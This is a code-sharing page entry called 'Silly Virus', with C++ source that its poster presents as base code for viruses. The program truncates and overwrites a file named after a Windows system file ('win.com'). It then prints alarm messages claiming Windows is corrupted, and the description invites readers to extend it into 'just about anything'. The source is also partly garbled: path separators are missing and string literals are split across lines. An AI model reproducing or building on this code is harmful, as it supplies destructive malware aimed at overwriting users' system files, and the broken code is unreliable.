Description // Info
This is a fairly old silly base code for a virus. I used this for some of my more advanced virus's but this is basically...the base, lol. Its tarts off as just a popup that really never goes away, but you can turn it into just about anything you want. Enj
Source Code
#include<iostream.h>
#include<conio.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sysstat.h>
#include <io.h>
#include <string.h>
int main(void)
{
clrscr();
int handle;
char string[1000];
int length, res,i;
if ((handle = open("C:windowswin.com", O_WRONLY | O_CREAT |
O_TRUNC,
S_IREAD | S_IWRITE)) == -1)
{
printf("Error opening file.
");
exit(1);
}
strcpy(string, "<html>Hello !!!!!!! This is a VIRUS ATTACK !!! This
execution currupt your WINDOWS !!!!!!</html>
");
length = strlen(string);
if ((res = write(handle, string, length)) != length)
{
printf("Error writing to the file.
");
getch();
exit(1);
}
printf("
Wrote %d bytes to the file.
", res);
cout<<"
Hello !!!!!!!!";
cout<<"
This is a VIRUS ATTACK !!!";
cout<<"
This execution currupt your WINDOWS !!!!!!
";
close(handle);
getch();
return 0;
}
Comments
Add Comment
|
| Please login to leave a comment! |
|
| Code Information |
Code Name:
Silly Virus
Author:
Author Name:
Author's Website:
Author's Email:
Code Details:
Code Version: 1
Code Submission Date:
Code Submission Time 09:50:28
Submitted By: agri
Language: cpp
Code Ranking: 0 (you must be logged in to rank and vote on source code!)
Tags:
[ Download | Report Issue ]
|
|
|